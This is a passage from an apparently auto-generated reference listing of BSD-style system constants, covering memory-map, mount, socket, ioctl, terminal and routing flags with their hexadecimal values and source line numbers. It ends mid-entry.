MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 992) | MAP_ANON = 0x1000 constant MAP_FILE (line 993) | MAP_FILE = 0x0 constant MAP_FIXED (line 994) | MAP_FIXED = 0x10 constant MAP_HASSEMAPHORE (line 995) | MAP_HASSEMAPHORE = 0x200 constant MAP_INHERIT (line 996) | MAP_INHERIT = 0x80 constant MAP_INHERIT_COPY (line 997) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_DEFAULT (line 998) | MAP_INHERIT_DEFAULT = 0x1 constant MAP_INHERIT_DONATE_COPY (line 999) | MAP_INHERIT_DONATE_COPY = 0x3 constant MAP_INHERIT_NONE (line 1000) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1001) | MAP_INHERIT_SHARE = 0x0 constant MAP_NORESERVE (line 1002) | MAP_NORESERVE = 0x40 constant MAP_PRIVATE (line 1003) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1004) | MAP_RENAME = 0x20 constant MAP_SHARED (line 1005) | MAP_SHARED = 0x1 constant MAP_STACK (line 1006) | MAP_STACK = 0x2000 constant MAP_TRYFIXED (line 1007) | MAP_TRYFIXED = 0x400 constant MAP_WIRED (line 1008) | MAP_WIRED = 0x800 constant MNT_ASYNC (line 1009) | MNT_ASYNC = 0x40 constant MNT_BASIC_FLAGS (line 1010) | MNT_BASIC_FLAGS = 0xe782807f constant MNT_DEFEXPORTED (line 1011) | MNT_DEFEXPORTED = 0x200 constant MNT_DISCARD (line 1012) | MNT_DISCARD = 0x800000 constant MNT_EXKERB (line 1013) | MNT_EXKERB = 0x800 constant MNT_EXNORESPORT (line 1014) | MNT_EXNORESPORT = 0x8000000 constant MNT_EXPORTANON (line 1015) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1016) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1017) | MNT_EXPUBLIC = 0x10000000 constant MNT_EXRDONLY (line 1018) | MNT_EXRDONLY = 0x80 constant MNT_EXTATTR (line 1019) | MNT_EXTATTR = 0x1000000 constant MNT_FORCE (line 1020) | MNT_FORCE = 0x80000 constant MNT_GETARGS (line 1021) | MNT_GETARGS = 0x400000 constant MNT_IGNORE (line 1022) | MNT_IGNORE = 0x100000 constant MNT_LAZY (line 1023) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1024) | MNT_LOCAL = 0x1000 constant MNT_LOG (line 1025) | MNT_LOG = 0x2000000 constant MNT_NOATIME (line 1026) | MNT_NOATIME = 0x4000000 constant MNT_NOCOREDUMP (line 1027) | MNT_NOCOREDUMP = 0x8000 constant MNT_NODEV (line 1028) | MNT_NODEV = 0x10 constant MNT_NODEVMTIME (line 1029) | MNT_NODEVMTIME = 0x40000000 constant MNT_NOEXEC (line 1030) | MNT_NOEXEC = 0x4 constant MNT_NOSUID (line 1031) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1032) | MNT_NOWAIT = 0x2 constant MNT_OP_FLAGS (line 1033) | MNT_OP_FLAGS = 0x4d0000 constant MNT_QUOTA (line 1034) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1035) | MNT_RDONLY = 0x1 constant MNT_RELATIME (line 1036) | MNT_RELATIME = 0x20000 constant MNT_RELOAD (line 1037) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1038) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1039) | MNT_SOFTDEP = 0x80000000 constant MNT_SYMPERM (line 1040) | MNT_SYMPERM = 0x20000000 constant MNT_SYNCHRONOUS (line 1041) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1042) | MNT_UNION = 0x20 constant MNT_UPDATE (line 1043) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1044) | MNT_VISFLAGMASK = 0xff90ffff constant MNT_WAIT (line 1045) | MNT_WAIT = 0x1 constant MSG_BCAST (line 1046) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1047) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CONTROLMBUF (line 1048) | MSG_CONTROLMBUF = 0x2000000 constant MSG_CTRUNC (line 1049) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1050) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1051) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1052) | MSG_EOR = 0x8 constant MSG_IOVUSRSPACE (line 1053) | MSG_IOVUSRSPACE = 0x4000000 constant MSG_LENUSRSPACE (line 1054) | MSG_LENUSRSPACE = 0x8000000 constant MSG_MCAST (line 1055) | MSG_MCAST = 0x200 constant MSG_NAMEMBUF (line 1056) | MSG_NAMEMBUF = 0x1000000 constant MSG_NBIO (line 1057) | MSG_NBIO = 0x1000 constant MSG_NOSIGNAL (line 1058) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1059) | MSG_OOB = 0x1 constant MSG_PEEK (line 1060) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1061) | MSG_TRUNC = 0x10 constant MSG_USERFLAGS (line 1062) | MSG_USERFLAGS = 0xffffff constant MSG_WAITALL (line 1063) | MSG_WAITALL = 0x40 constant MS_ASYNC (line 1064) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1065) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1066) | MS_SYNC = 0x4 constant NAME_MAX (line 1067) | NAME_MAX = 0x1ff constant NET_RT_DUMP (line 1068) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1069) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1070) | NET_RT_IFLIST = 0x5 constant NET_RT_MAXID (line 1071) | NET_RT_MAXID = 0x6 constant NET_RT_OIFLIST (line 1072) | NET_RT_OIFLIST = 0x4 constant NET_RT_OOIFLIST (line 1073) | NET_RT_OOIFLIST = 0x3 constant NFDBITS (line 1074) | NFDBITS = 0x20 constant NOFLSH (line 1075) | NOFLSH = 0x80000000 constant NOTE_ATTRIB (line 1076) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1077) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1078) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1079) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1080) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1081) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1082) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1083) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1084) | NOTE_LOWAT = 0x1 constant NOTE_PCTRLMASK (line 1085) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1086) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1087) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1088) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1089) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1090) | NOTE_TRACKERR = 0x2 constant NOTE_WRITE (line 1091) | NOTE_WRITE = 0x2 constant OCRNL (line 1092) | OCRNL = 0x10 constant OFIOGETBMAP (line 1093) | OFIOGETBMAP = 0xc004667a constant ONLCR (line 1094) | ONLCR = 0x2 constant ONLRET (line 1095) | ONLRET = 0x40 constant ONOCR (line 1096) | ONOCR = 0x20 constant ONOEOT (line 1097) | ONOEOT = 0x8 constant OPOST (line 1098) | OPOST = 0x1 constant O_ACCMODE (line 1099) | O_ACCMODE = 0x3 constant O_ALT_IO (line 1100) | O_ALT_IO = 0x40000 constant O_APPEND (line 1101) | O_APPEND = 0x8 constant O_ASYNC (line 1102) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1103) | O_CLOEXEC = 0x400000 constant O_CREAT (line 1104) | O_CREAT = 0x200 constant O_DIRECT (line 1105) | O_DIRECT = 0x80000 constant O_DIRECTORY (line 1106) | O_DIRECTORY = 0x200000 constant O_DSYNC (line 1107) | O_DSYNC = 0x10000 constant O_EXCL (line 1108) | O_EXCL = 0x800 constant O_EXLOCK (line 1109) | O_EXLOCK = 0x20 constant O_FSYNC (line 1110) | O_FSYNC = 0x80 constant O_NDELAY (line 1111) | O_NDELAY = 0x4 constant O_NOCTTY (line 1112) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1113) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1114) | O_NONBLOCK = 0x4 constant O_NOSIGPIPE (line 1115) | O_NOSIGPIPE = 0x1000000 constant O_RDONLY (line 1116) | O_RDONLY = 0x0 constant O_RDWR (line 1117) | O_RDWR = 0x2 constant O_RSYNC (line 1118) | O_RSYNC = 0x20000 constant O_SHLOCK (line 1119) | O_SHLOCK = 0x10 constant O_SYNC (line 1120) | O_SYNC = 0x80 constant O_TRUNC (line 1121) | O_TRUNC = 0x400 constant O_WRONLY (line 1122) | O_WRONLY = 0x1 constant PARENB (line 1123) | PARENB = 0x1000 constant PARMRK (line 1124) | PARMRK = 0x8 constant PARODD (line 1125) | PARODD = 0x2000 constant PENDIN (line 1126) | PENDIN = 0x20000000 constant PROT_EXEC (line 1127) | PROT_EXEC = 0x4 constant PROT_NONE (line 1128) | PROT_NONE = 0x0 constant PROT_READ (line 1129) | PROT_READ = 0x1 constant PROT_WRITE (line 1130) | PROT_WRITE = 0x2 constant PRI_IOFLUSH (line 1131) | PRI_IOFLUSH = 0x7c constant PRIO_PGRP (line 1132) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1133) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1134) | PRIO_USER = 0x2 constant RLIMIT_AS (line 1135) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1136) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1137) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1138) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1139) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1140) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1141) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1142) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1143) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1144) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1145) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1146) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1147) | RTAX_BRD = 0x7 constant RTAX_DST (line 1148) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1149) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1150) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1151) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1152) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1153) | RTAX_MAX = 0x9 constant RTAX_NETMASK (line 1154) | RTAX_NETMASK = 0x2 constant RTAX_TAG (line 1155) | RTAX_TAG = 0x8 constant RTA_AUTHOR (line 1156) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1157) | RTA_BRD = 0x80 constant RTA_DST (line 1158) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1159) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1160) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1161) | RTA_IFA = 0x20 constant RTA_IFP (line 1162) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1163) | RTA_NETMASK = 0x4 constant RTA_TAG (line 1164) | RTA_TAG = 0x100 constant RTF_ANNOUNCE (line 1165) | RTF_ANNOUNCE = 0x20000 constant RTF_BLACKHOLE (line 1166) | RTF_BLACKHOLE = 0x1000 constant RTF_CLONED (line 1167) | RTF_CLONED = 0x2000 constant RTF_CLONING (line 1168) | RTF_CLONING = 0x100 constant RTF_DONE (line 1169) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1170) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 1171) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1172) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1173) | RTF_LLINFO = 0x400 constant RTF_MASK (line 1174) | RTF_MASK = 0x80 constant RTF_MODIFIED (line 1175) | RTF_MODIFIED = 0x20 constant RTF_PROTO1 (line 1176) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1177) | RTF_PROTO2 = 0x4000 constant RTF_REJECT (line 1178) | RTF_REJECT = 0x8 constant RTF_SRC (line 1179) | RTF_SRC = 0x10000 constant RTF_STATIC (line 1180) | RTF_STATIC = 0x800 constant RTF_UP (line 1181) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1182) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1183) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1184) | RTM_CHANGE = 0x3 constant RTM_CHGADDR (line 1185) | RTM_CHGADDR = 0x15 constant RTM_DELADDR (line 1186) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1187) | RTM_DELETE = 0x2 constant RTM_GET (line 1188) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1189) | RTM_IEEE80211 = 0x11 constant RTM_IFANNOUNCE (line 1190) | RTM_IFANNOUNCE = 0x10 constant RTM_IFINFO (line 1191) | RTM_IFINFO = 0x14 constant RTM_LLINFO_UPD (line 1192) | RTM_LLINFO_UPD = 0x13 constant RTM_LOCK (line 1193) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1194) | RTM_LOSING = 0x5 constant RTM_MISS (line 1195) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1196) | RTM_NEWADDR = 0xc constant RTM_OIFINFO (line 1197) | RTM_OIFINFO = 0xf constant RTM_OLDADD (line 1198) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 1199) | RTM_OLDDEL = 0xa constant RTM_OOIFINFO (line 1200) | RTM_OOIFINFO = 0xe constant RTM_REDIRECT (line 1201) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1202) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1203) | RTM_RTTUNIT = 0xf4240 constant RTM_SETGATE (line 1204) | RTM_SETGATE = 0x12 constant RTM_VERSION (line 1205) | RTM_VERSION = 0x4 constant RTV_EXPIRE (line 1206) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1207) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1208) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1209) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1210) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1211) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1212) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1213) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 1214) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1215) | RUSAGE_SELF = 0x0 constant SCM_CREDS (line 1216) | SCM_CREDS = 0x4 constant SCM_RIGHTS (line 1217) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1218) | SCM_TIMESTAMP = 0x8 constant SHUT_RD (line 1219) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1220) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1221) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1222) | SIOCADDMULTI = 0x80906931 constant SIOCADDRT (line 1223) | SIOCADDRT = 0x8030720a constant SIOCAIFADDR (line 1224) | SIOCAIFADDR = 0x8040691a constant SIOCALIFADDR (line 1225) | SIOCALIFADDR = 0x8118691c constant SIOCATMARK (line 1226) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1227) | SIOCDELMULTI = 0x80906932 constant SIOCDELRT (line 1228) | SIOCDELRT = 0x8030720b constant SIOCDIFADDR (line 1229) | SIOCDIFADDR = 0x80906919 constant SIOCDIFPHYADDR (line 1230) | SIOCDIFPHYADDR = 0x80906949 constant SIOCDLIFADDR (line 1231) | SIOCDLIFADDR = 0x8118691e constant SIOCGDRVSPEC (line 1232) | SIOCGDRVSPEC = 0xc01c697b constant SIOCGETPFSYNC (line 1233) | SIOCGETPFSYNC = 0xc09069f8 constant SIOCGETSGCNT (line 1234) | SIOCGETSGCNT = 0xc0147534 constant SIOCGETVIFCNT (line 1235) | SIOCGETVIFCNT = 0xc0147533 constant SIOCGHIWAT (line 1236) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 1237) | SIOCGIFADDR = 0xc0906921 constant SIOCGIFADDRPREF (line 1238) | SIOCGIFADDRPREF = 0xc0946920 constant SIOCGIFALIAS (line 1239) | SIOCGIFALIAS = 0xc040691b constant SIOCGIFBRDADDR (line 1240) | SIOCGIFBRDADDR = 0xc0906923 constant SIOCGIFCAP (line 1241) | SIOCGIFCAP = 0xc0206976 constant SIOCGIFCONF (line 1242) | SIOCGIFCONF = 0xc0086926 constant SIOCGIFDATA (line 1243) | SIOCGIFDATA = 0xc0946985 constant SIOCGIFDLT (line 1244) | SIOCGIFDLT = 0xc0906977 constant SIOCGIFDSTADDR (line 1245) | SIOCGIFDSTADDR = 0xc0906922 constant SIOCGIFFLAGS (line 1246) | SIOCGIFFLAGS = 0xc0906911 constant SIOCGIFGENERIC (line 1247) | SIOCGIFGENERIC = 0xc090693a constant SIOCGIFMEDIA (line 1248) | SIOCGIFMEDIA = 0xc0286936 constant SIOCGIFMETRIC (line 1249) | SIOCGIFMETRIC = 0xc0906917 constant SIOCGIFMTU (line 1250) | SIOCGIFMTU = 0xc090697e constant SIOCGIFNETMASK (line 1251) | SIOCGIFNETMASK = 0xc0906925 constant SIOCGIFPDSTADDR (line 1252) | SIOCGIFPDSTADDR = 0xc0906948 constant SIOCGIFPSRCADDR (line 1253) | SIOCGIFPSRCADDR = 0xc0906947 constant SIOCGLIFADDR (line 1254) | SIOCGLIFADDR = 0xc118691d constant SIOCGLIFPHYADDR (line 1255) | SIOCGLIFPHYADDR = 0xc118694b constant SIOCGLINKSTR (line 1256) | SIOCGLINKSTR = 0xc01c6987 constant SIOCGLOWAT (line 1257) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1258) | SIOCGPGRP = 0x40047309 constant SIOCGVH (line 1259) | SIOCGVH = 0xc0906983 constant SIOCIFCREATE (line 1260) | SIOCIFCREATE = 0x8090697a constant SIOCIFDESTROY (line 1261) | SIOCIFDESTROY = 0x80906979 constant SIOCIFGCLONERS (line 1262) | SIOCIFGCLONERS = 0xc00c6978 constant SIOCINITIFADDR (line 1263) | SIOCINITIFADDR = 0xc0446984 constant SIOCSDRVSPEC (line 1264) | SIOCSDRVSPEC = 0x801c697b constant SIOCSETPFSYNC (line 1265) | SIOCSETPFSYNC = 0x809069f7 constant SIOCSHIWAT (line 1266) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1267) | SIOCSIFADDR = 0x8090690c constant SIOCSIFADDRPREF (line 1268) | SIOCSIFADDRPREF = 0x8094691f constant SIOCSIFBRDADDR (line 1269) | SIOCSIFBRDADDR = 0x80906913 constant SIOCSIFCAP (line 1270) | SIOCSIFCAP = 0x80206975 constant SIOCSIFDSTADDR (line 1271) | SIOCSIFDSTADDR = 0x8090690e constant SIOCSIFFLAGS (line 1272) | SIOCSIFFLAGS = 0x80906910 constant SIOCSIFGENERIC (line 1273) | SIOCSIFGENERIC = 0x80906939 constant SIOCSIFMEDIA (line 1274) | SIOCSIFMEDIA = 0xc0906935 constant SIOCSIFMETRIC (line 1275) | SIOCSIFMETRIC = 0x80906918 constant SIOCSIFMTU (line 1276) | SIOCSIFMTU = 0x8090697f constant SIOCSIFNETMASK (line 1277) | SIOCSIFNETMASK = 0x80906916 constant SIOCSIFPHYADDR (line 1278) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSLIFPHYADDR (line 1279) | SIOCSLIFPHYADDR = 0x8118694a constant SIOCSLINKSTR (line 1280) | SIOCSLINKSTR = 0x801c6988 constant SIOCSLOWAT (line 1281) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1282) | SIOCSPGRP = 0x80047308 constant SIOCSVH (line 1283) | SIOCSVH = 0xc0906982 constant SIOCZIFDATA (line 1284) | SIOCZIFDATA = 0xc0946986 constant SOCK_CLOEXEC (line 1285) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1286) | SOCK_DGRAM = 0x2 constant SOCK_FLAGS_MASK (line 1287) | SOCK_FLAGS_MASK = 0xf0000000 constant SOCK_NONBLOCK (line 1288) | SOCK_NONBLOCK = 0x20000000 constant SOCK_NOSIGPIPE (line 1289) | SOCK_NOSIGPIPE = 0x40000000 constant SOCK_RAW (line 1290) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1291) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1292) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1293) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1294) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1295) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1296) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1297) | SO_ACCEPTFILTER = 0x1000 constant SO_BROADCAST (line 1298) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1299) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 1300) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1301) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1302) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1303) | SO_LINGER = 0x80 constant SO_NOHEADER (line 1304) | SO_NOHEADER = 0x100a constant SO_NOSIGPIPE (line 1305) | SO_NOSIGPIPE = 0x800 constant SO_OOBINLINE (line 1306) | SO_OOBINLINE = 0x100 constant SO_OVERFLOWED (line 1307) | SO_OVERFLOWED = 0x1009 constant SO_RCVBUF (line 1308) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1309) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1310) | SO_RCVTIMEO = 0x100c constant SO_REUSEADDR (line 1311) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1312) | SO_REUSEPORT = 0x200 constant SO_SNDBUF (line 1313) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1314) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1315) | SO_SNDTIMEO = 0x100b constant SO_TIMESTAMP (line 1316) | SO_TIMESTAMP = 0x2000 constant SO_TYPE (line 1317) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1318) | SO_USELOOPBACK = 0x40 constant SYSCTL_VERSION (line 1319) | SYSCTL_VERSION = 0x1000000 constant SYSCTL_VERS_0 (line 1320) | SYSCTL_VERS_0 = 0x0 constant SYSCTL_VERS_1 (line 1321) | SYSCTL_VERS_1 = 0x1000000 constant SYSCTL_VERS_MASK (line 1322) | SYSCTL_VERS_MASK = 0xff000000 constant S_ARCH1 (line 1323) | S_ARCH1 = 0x10000 constant S_ARCH2 (line 1324) | S_ARCH2 = 0x20000 constant S_BLKSIZE (line 1325) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1326) | S_IEXEC = 0x40 constant S_IFBLK (line 1327) | S_IFBLK = 0x6000 constant S_IFCHR (line 1328) | S_IFCHR = 0x2000 constant S_IFDIR (line 1329) | S_IFDIR = 0x4000 constant S_IFIFO (line 1330) | S_IFIFO = 0x1000 constant S_IFLNK (line 1331) | S_IFLNK = 0xa000 constant S_IFMT (line 1332) | S_IFMT = 0xf000 constant S_IFREG (line 1333) | S_IFREG = 0x8000 constant S_IFSOCK (line 1334) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1335) | S_IFWHT = 0xe000 constant S_IREAD (line 1336) | S_IREAD = 0x100 constant S_IRGRP (line 1337) | S_IRGRP = 0x20 constant S_IROTH (line 1338) | S_IROTH = 0x4 constant S_IRUSR (line 1339) | S_IRUSR = 0x100 constant S_IRWXG (line 1340) | S_IRWXG = 0x38 constant S_IRWXO (line 1341) | S_IRWXO = 0x7 constant S_IRWXU (line 1342) | S_IRWXU = 0x1c0 constant S_ISGID (line 1343) | S_ISGID = 0x400 constant S_ISTXT (line 1344) | S_ISTXT = 0x200 constant S_ISUID (line 1345) | S_ISUID = 0x800 constant S_ISVTX (line 1346) | S_ISVTX = 0x200 constant S_IWGRP (line 1347) | S_IWGRP = 0x10 constant S_IWOTH (line 1348) | S_IWOTH = 0x2 constant S_IWRITE (line 1349) | S_IWRITE = 0x80 constant S_IWUSR (line 1350) | S_IWUSR = 0x80 constant S_IXGRP (line 1351) | S_IXGRP = 0x8 constant S_IXOTH (line 1352) | S_IXOTH = 0x1 constant S_IXUSR (line 1353) | S_IXUSR = 0x40 constant TCIFLUSH (line 1354) | TCIFLUSH = 0x1 constant TCIOFLUSH (line 1355) | TCIOFLUSH = 0x3 constant TCOFLUSH (line 1356) | TCOFLUSH = 0x2 constant TCP_CONGCTL (line 1357) | TCP_CONGCTL = 0x20 constant TCP_KEEPCNT (line 1358) | TCP_KEEPCNT = 0x6 constant TCP_KEEPIDLE (line 1359) | TCP_KEEPIDLE = 0x3 constant TCP_KEEPINIT (line 1360) | TCP_KEEPINIT = 0x7 constant TCP_KEEPINTVL (line 1361) | TCP_KEEPINTVL = 0x5 constant TCP_MAXBURST (line 1362) | TCP_MAXBURST = 0x4 constant TCP_MAXSEG (line 1363) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1364) | TCP_MAXWIN = 0xffff constant TCP_MAX_WINSHIFT (line 1365) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1366) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1367) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1368) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1369) | TCP_NODELAY = 0x1 constant TCSAFLUSH (line 1370) | TCSAFLUSH = 0x2 constant TIOCCBRK (line 1371) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1372) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1373) | TIOCCONS = 0x80047462 constant TIOCDCDTIMESTAMP (line 1374) | TIOCDCDTIMESTAMP = 0x400c7458 constant TIOCDRAIN (line 1375) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1376) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1377) | TIOCEXT = 0x80047460 constant TIOCFLAG_CDTRCTS (line 1378) | TIOCFLAG_CDTRCTS = 0x10 constant TIOCFLAG_CLOCAL (line 1379) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1380) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1381) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_SOFTCAR (line 1382) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1383) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1384) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1385) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1386) | TIOCGFLAGS = 0x4004745d constant TIOCGLINED (line 1387) | TIOCGLINED = 0x40207442 constant TIOCGPGRP (line 1388) | TIOCGPGRP = 0x40047477 constant TIOCGQSIZE (line 1389) | TIOCGQSIZE = 0x40047481 constant TIOCGRANTPT (line 1390) | TIOCGRANTPT = 0x20007447 constant TIOCGSID (line 1391) | TIOCGSID = 0x40047463 constant TIOCGSIZE (line 1392) | TIOCGSIZE = 0x40087468 constant TIOCGWINSZ (line 1393) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1394) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1395) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1396) | TIOCMGET = 0x4004746a constant TIOCMSET (line 1397) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1398) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1399) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1400) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1401) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1402) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1403) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1404) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1405) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1406) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1407) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1408) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1409) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1410) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1411) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1412) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1413) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1414) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1415) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1416) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1417) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1418) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1419) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1420) | TIOCPKT_STOP = 0x4 constant TIOCPTMGET (line 1421) | TIOCPTMGET = 